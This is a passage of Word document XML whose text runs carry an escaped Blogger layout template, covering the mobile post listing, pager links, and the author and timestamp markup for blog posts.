    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:post.dateHeader'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='date-header'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;span&gt;&lt;data:post.dateHeader/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='mobile-post-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;h3 class='mobile-index-title entry-title' itemprop='name'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;data:post.title/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='mobile-index-arrow'&gt;&amp;amp;rsaquo;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='mobile-index-contents'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:post.thumbnailUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div class='mobile-index-thumbnail'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;div class='Image'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;img expr:src='data:post.thumbnailUrl'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='post-body'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;b:if cond='data:post.snippet'&gt;&lt;data:post.snippet/&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div style='clear: both;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='mobile-index-comment'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include cond='data:blog.pageType != &amp;quot;static_page&amp;quot;                          and data:post.allowComments                          and data:post.numComments != 0' data='post' name='comment_count_picker'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='mobile-main' var='top'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;!-- posts --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='blog-posts hfeed'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:include data='top' name='status-message'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:blog.pageType == &amp;quot;index&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:loop values='data:posts' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include data='post' name='mobile-index-post'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:loop values='data:posts' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include data='post' name='mobile-post'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:include name='mobile-nextprev'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        &lt;b:includable id='mobile-nextprev'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='bpt' id='bpt'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:newerPageUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='mobile-link-button' id='blog-pager-newer-link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + &amp;quot;_blog-pager-newer-link&amp;quot;' expr:title='data:newerPageTitle'&gt;&amp;amp;lsaquo;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:olderPageUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='mobile-link-button' id='blog-pager-older-link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &amp;quot;_blog-pager-older-link&amp;quot;' expr:title='data:olderPageTitle'&gt;&amp;amp;rsaquo;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='mobile-link-button' id='blog-pager-home-link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a class='home-link' expr:href='data:blog.homepageUrl'&gt;&lt;data:homeMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='mobile-desktop-link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a class='home-link' expr:href='data:desktopLinkUrl'&gt;&lt;data:desktopLinkMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='clear'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='mobile-post' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='date-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:post.dateHeader'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;h2 class='date-header'&gt;&lt;span&gt;&lt;data:post.dateHeader/&gt;&lt;/span&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='date-posts'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='post-outer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;div class='post hentry uncustomized-post-template' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:post.thumbnailUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;meta expr:content='data:post.thumbnailUrl' itemprop='image_url'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;meta expr:content='data:blog.blogId' itemprop='blogId'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;meta expr:content='data:post.id' itemprop='postId'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;a expr:name='data:post.id'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:post.title'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;h3 class='post-title entry-title' itemprop='name'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:post.link'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a expr:href='data:post.link'&gt;&lt;data:post.title/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:elseif cond='data:post.url and data:blog.url != data:post.url'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a expr:href='data:post.url'&gt;&lt;data:post.title/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;data:post.title/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='post-header'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div class='post-header-line-1'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='post-body entry-content' expr:id='&amp;quot;post-body-&amp;quot; + data:post.id' itemprop='articleBody'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:post.body/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div style='clear: both;'/&gt; &lt;!-- clear for photos floats --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='post-footer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div class='post-footer-line post-footer-line-1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;span class='post-author vcard'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:if cond='data:top.showAuthor'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;b:if cond='data:post.authorProfileUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                            &lt;span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                              &lt;meta expr:content='data:post.authorProfileUrl' itemprop='url'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                              &lt;a expr:href='data:post.authorProfileUrl' rel='author' title='author profile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                                &lt;span itemprop='name'&gt;&lt;data:post.author/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                              &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                            &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                            &lt;span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                              &lt;span itemprop='name'&gt;&lt;data:post.author/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                            &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;span class='post-timestamp'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:if cond='data:top.showTimestamp'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;data:top.timestampLabel/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;b:if cond='data:post.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                            &lt;meta expr:content='data:post.url.canonical' itemprop='url'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                            &lt;a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'&gt;&lt;abbr class='published' expr:title='data:post.timestampISO8601' itemprop='datePublished'&gt;&lt;data:post.timestamp/&gt;&lt;/abbr&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
